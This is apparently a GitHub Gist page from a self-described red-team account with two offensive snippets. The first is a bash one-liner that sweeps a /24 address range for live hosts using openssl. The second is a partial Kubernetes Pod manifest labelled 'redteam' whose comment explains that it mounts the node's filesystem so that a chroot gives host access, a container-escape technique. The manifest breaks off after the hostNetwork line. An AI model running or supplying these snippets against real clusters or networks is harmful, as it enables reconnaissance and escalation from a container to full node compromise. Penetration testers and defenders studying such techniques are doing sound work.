Skip to content

Instantly share code, notes, and snippets.

# Scan IP range
LOS_24_IP="ENTER_IP_TO_SCAN";IP=$(echo $LOS_24_IP | cut -d"." -f1,2,3);for i in $(seq 1 255); do NEW_IP=$(echo $IP.$i); (timeout .1 openssl s_client $NEW_IP 2>&1 | grep -q "connect:errno" && echo "$NEW_IP,up" 2>/dev/null) 2>/dev/null ;done
@LowOrbitSecurity
LowOrbitSecurity / pod2node.yaml
Created January 10, 2025 12:56
pod2node.yaml
# Create a pod that mounts the nodes filesystem
# Run `kubectl exec -it <pod_name> -- chroot /host` to get access.
apiVersion: v1
kind: Pod
metadata:
name: loworbit
labels:
owner: redteam
spec:
hostNetwork: true